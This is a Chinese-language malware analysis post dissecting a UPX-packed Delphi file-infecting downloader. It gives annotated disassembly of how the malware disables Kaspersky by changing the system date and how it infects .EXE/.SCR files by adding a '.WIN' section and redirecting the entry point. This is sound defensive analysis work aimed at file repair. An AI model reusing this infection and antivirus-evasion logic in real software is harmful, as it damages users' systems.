本文涉及的问题:
1. 它是如何感染一个.EXE或.SCR文件的
2. 被感染文件被加入的代码内容及其行为
3. 基于1和2,简要说明被感染文件的修复问题
本文没有涉及的问题:
1. 该病毒如何修改注册表
2. 该病毒生成哪些病毒体文件(包括是否在磁盘根目录生成病毒副本)
3. 该病毒如何下载其他病毒
4. 该病毒感染哪些文件夹下的文件
以上这些内容,就待各位同仁去挖掘了。
样本来源:剑盟样本区http://bbs.janmeng.com/thread-675071-1-1.html
加壳情况:加UPX壳,直接用脱壳机脱壳(太懒了-_-)
脱壳后:基址13140000,入口点偏移00015570
分析方法:脱壳后OD载入看反汇编结果
病毒定性:(改节表)感染型下载者
前奏(准备工作):
创建名为wokaon的互斥对象,EnumWindows似乎是在找卡巴的窗口,找到后则先将系统年份改为1984年(7C0H),Sleep了20秒等卡巴挂掉后,再把时间改回来。这部分反汇编结果:
***************************************************************************************************
13155581 68 68561513 push 13155668 ;ASCII "wokaon"
13155586 6A 00 push 0
13155588 6A 00 push 0
1315558A E8 C508FFFF call
1315558F 8BD8 mov ebx, eax
13155591 E8 8609FFFF call
13155596 3D B7000000 cmp eax, 0B7
1315559B 0F84 BA000000 je 1315565B
131555A1 C605 A8791513 0>mov byte ptr [131579A8], 0
131555A8 6A 00 push 0
131555AA 68 A4531513 push 131553A4
131555AF E8 800AFFFF call
131555B4 803D A8791513 0>cmp byte ptr [131579A8], 0
131555BB 75 07 jnz short 131555C4
131555BD E8 F2EAFFFF call 131540B4
131555C2 EB 44 jmp short 13155608
131555C4 68 98791513 push 13157998
131555C9 E8 5609FFFF call
131555CE 66:8B1D 9879151>mov bx, word ptr [13157998]
131555D5 66:C705 9879151>mov word ptr [13157998], 7C0
131555DE 68 98791513 push 13157998
131555E3 E8 DC09FFFF call
131555E8 68 204E0000 push 4E20
131555ED E8 CA64FFFF call
131555F2 E8 BDEAFFFF call 131540B4
131555F7 66:891D 9879151>mov word ptr [13157998], bx
131555FE 68 98791513 push 13157998
13155603 E8 BC09FFFF call
13155608 68 10270000 push 2710
1315560D E8 AA64FFFF call
***************************************************************************************************
创建两个线程,一个用于植入病毒和感染文件,另一个应该是用于下载的。
***************************************************************************************************
1315561C 68 90791513 push 13157990
13155621 6A 00 push 0
13155623 6A 00 push 0
13155625 68 88481513 push offset
1315562A 6A 00 push 0
1315562C 6A 00 push 0
1315562E E8 4908FFFF call
13155633 68 94791513 push 13157994
13155638 6A 00 push 0
1315563A 6A 00 push 0
1315563C 68 14501513 push offset
13155641 6A 00 push 0
13155643 6A 00 push 0
13155645 E8 3208FFFF call
***************************************************************************************************
我比较关心感染文件的内容。感染前有判断驱动器属性,不过Delphi对此封装得太多,我看call看得眼花。所以它是哪些文件夹下的文件不感染,哪些文件夹下的文件被感染,这个我没有仔细看。
最后进入N多个call后找到对.EXE和.SCR文件进行感染的部分代码
一、病毒对.EXE和.SCR文件的PE结构进行识别并感染的部分分析
代码从13152D8C开始,先CreateFileA打开文件之后进行识别并感染。
部分进行感染的代码:
读DOS文件头,定位PE头:
***************************************************************************************************
13152E00 6A 00 push 0
13152E02 8D45 EC lea eax, dword ptr [ebp-14]
13152E05 50 push eax
13152E06 6A 40 push 40
13152E08 8D45 A8 lea eax, dword ptr [ebp-58]
13152E0B 50 push eax
13152E0C 8B45 F4 mov eax, dword ptr [ebp-C]
13152E0F 50 push eax
13152E10 E8 7F31FFFF call
13152E15 66:817D A8 4D5A cmp word ptr [ebp-58], 5A4D ;MZ
13152E1B 74 11 je short 13152E2E
……………………
13152E2E 6A 00 push 0
13152E30 6A 00 push 0
13152E32 8B45 E4 mov eax, dword ptr [ebp-1C] ;算一下,ebp-1C=ebp-58+3C,在上面的ReadFile之后,这里正是e_lfanew,即到PE头的偏移
13152E35 50 push eax
13152E36 8B45 F4 mov eax, dword ptr [ebp-C]
13152E39 50 push eax
13152E3A E8 7D31FFFF call
***************************************************************************************************
读PE头,得到节数:
***************************************************************************************************
13152E3F 6A 00 push 0
13152E41 8D45 EC lea eax, dword ptr [ebp-14]
13152E44 50 push eax
13152E45 68 F8000000 push 0F8
13152E4A 8D85 B0FEFFFF lea eax, dword ptr [ebp-150]
13152E50 50 push eax
13152E51 8B45 F4 mov eax, dword ptr [ebp-C]
13152E54 50 push eax
13152E55 E8 3A31FFFF call
13152E5A 81BD B0FEFFFF 5>cmp dword ptr [ebp-150], 4550 ;"PE��"
13152E64 74 11 je short 13152E77
…………………………
13152E77 33FF xor edi, edi
13152E79 33C0 xor eax, eax
13152E7B 8945 F0 mov dword ptr [ebp-10], eax
13152E7E 0FB79D B6FEFFFF movzx ebx, word ptr [ebp-14A] ;算一下,ebp-14A=ebp-150+06,正好是IMAGE_NT_HEADERS结构中的NumberOfSections
***************************************************************************************************
循环读每一个IMAGE_SECTION_HEADER结构,对比其名字是否是.WIN,以判断是否已感染,并得到其他信息:
***************************************************************************************************
13152E85 4B dec ebx
13152E86 85DB test ebx, ebx
13152E88 7C 60 jl short 13152EEA ;最后一节已完,跳出
13152E8A 43 inc ebx
13152E8B 6A 00 push 0
13152E8D 8D45 EC lea eax, dword ptr [ebp-14]
13152E90 50 push eax
13152E91 6A 28 push 28
13152E93 56 push esi
13152E94 8B45 F4 mov eax, dword ptr [ebp-C]
13152E97 50 push eax
13152E98 E8 F730FFFF call
13152E9D 8D85 84FEFFFF lea eax, dword ptr [ebp-17C]
13152EA3 8BD6 mov edx, esi
13152EA5 E8 9A12FFFF call 13144144
13152EAA 8B85 84FEFFFF mov eax, dword ptr [ebp-17C]
13152EB0 BA 90301513 mov edx, 13153090 ;ASCII ".WIN"
13152EB5 E8 7A14FFFF call
13152EBA 75 11 jnz short 13152ECD ;不是.WIN节
13152EBC C745 F8 0200000>mov dword ptr [ebp-8], 2 ;是.WIN节,已被感染过
13152EC3 E8 900BFFFF call 13143A58
13152EC8 E9 87010000 jmp 13153054 ;跳过感染的代码
13152ECD 8B46 14 mov eax, dword ptr [esi+14] ;不是.WIN节,直接来到这里
13152ED0 0346 10 add eax, dword ptr [esi+10]
13152ED3 3BF8 cmp edi, eax
13152ED5 73 02 jnb short 13152ED9
13152ED7 8BF8 mov edi, eax
13152ED9 8B46 0C mov eax, dword ptr [esi+C]
13152EDC 0346 08 add eax, dword ptr [esi+8]
13152EDF 3B45 F0 cmp eax, dword ptr [ebp-10]
13152EE2 76 03 jbe short 13152EE7
13152EE4 8945 F0 mov dword ptr [ebp-10], eax
13152EE7 4B dec ebx
13152EE8 ^ 75 A1 jnz short 13152E8B
***************************************************************************************************
接着向堆栈中写新的IMAGE_SECTION_HEADER,修改堆栈中之前得到的PE头和DOS头结构的相关量(如节数,入口点等),并写回原文件相应位置。
其中:
***************************************************************************************************
13152EEA BB 882D1513 mov ebx, 13152D88
13152EEF 81EB F82B1513 sub ebx, 13152BF8
***************************************************************************************************
13152BF8到13152D88的位置,保存有将被写入被感染文件的可执行代码。
***************************************************************************************************
13152F8C 8B46 0C mov eax, dword ptr [esi+C]
13152F8F 05 C5000000 add eax, 0C5
13152F94 81C0 042C1513 add eax, 13152C04
13152F9A 81E8 F82B1513 sub eax, 13152BF8
13152FA0 8985 D8FEFFFF mov dword ptr [ebp-128], eax
***************************************************************************************************
13152C04处的代码,将成为程序的入口点指向的代码。